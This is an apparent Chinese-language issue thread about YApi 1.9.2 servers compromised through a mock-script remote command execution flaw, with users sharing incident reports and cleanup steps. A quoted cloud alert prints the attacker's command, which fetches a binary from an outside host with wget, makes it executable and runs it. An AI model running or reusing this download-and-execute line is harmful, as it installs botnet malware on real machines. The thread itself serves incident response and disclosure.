有安全漏洞, 服务器被入侵了

[vosho]

版本号

版本: 1.9.2

什么问题

服务器被入侵了, 阿里云报的:

-[25877]  PM2 v4.4.0: God Daemon (/root/.pm2)
    -[26378]  node server/app.js
        -[31498]  /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000

-[25877]  PM2 v4.4.0: God Daemon (/root/.pm2)
    -[26378]  node server/app.js

-[25877]  PM2 v4.4.0: God Daemon (/root/.pm2)
    -[26378]  node server/app.js
        -[31498]  /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
            -[31502]  ./20000
                -[31503]  ./20000

该告警由如下引擎检测发现：
文件路径: /usr/bin/ps
恶意文件md5: c303c2fff08565b7977afccb762e2072
扫描来源方式: 进程启动扫描
进程id: 31969
进程命令行: ps aux

如何复现此问题

~

什么浏览器

~

什么系统（Linux, Windows, macOS）

Centos

[isuoge]

我也是 ，一模一样 ，刚被草了

[shenX-2021]

下载了20000文件，要怎么处理

[shaoxyz]

+1

[Kingofhevil]

关机，建个磁盘快照，保留现场，然后重建服务器系统，磁盘都初始化。排查安全问题，确保其他服务器安全。

[Kingofhevil]

关机，建个磁盘快照，保留现场，然后重建服务器系统，磁盘都初始化。排查安全问题，确保其他服务器安全。

应该是个挖矿木马

[Tzng]

我也中了，真无语~

[Anbool]

巧了，我也是

[Anbool]

关机，建个磁盘快照，保留现场，然后重建服务器系统，磁盘都初始化。排查安全问题，确保其他服务器安全。

应该是个挖矿木马

不是，是DDOS木马

[luvvien]

wtf，我也被停了，难受呀，马飞，损失了一个亿

[tfenglin]

我也是，我已经备份数据重装系统了

[wwwfeng]

Ip被华为云ban了，现在已经重置系统了😅

[mylafe]

一模一样，mock远程命令执行漏洞。yapi注册功能关了，恶意搞事情账户已删除，服务器已快照回滚。
建议同步删除恶意mock脚本，防止二次受灾。

./mongo
> show dbs;
> use yapi;
> show tables;
> db.adv_mock.find();  # > DBQuery.shellBatchSize = 300 查询返回数
> db.adv_mock.deleteMany ({}) # 根据具体恶意mock数据过滤

BillGates僵尸网络木马

[luvvien]

一模一样，mock远程命令执行漏洞。yapi注册功能关了，恶意搞事情账户已删除，服务器已快照回滚

云服务器就很惨了，服务商直接就给shutdown，并且不给备份，不给开机，必须重置系统

[mylafe]

一模一样，mock远程命令执行漏洞。yapi注册功能关了，恶意搞事情账户已删除，服务器已快照回滚

云服务器就很惨了，服务商直接就给shutdown，并且不给备份，不给开机，必须重置系统

损失惨重！

[jwh5566]

一模一样，mock远程命令执行漏洞。yapi注册功能关了，恶意搞事情账户已删除，服务器已快照回滚

同云服务器，运气好，没给重置，下一次就要重置了 哈哈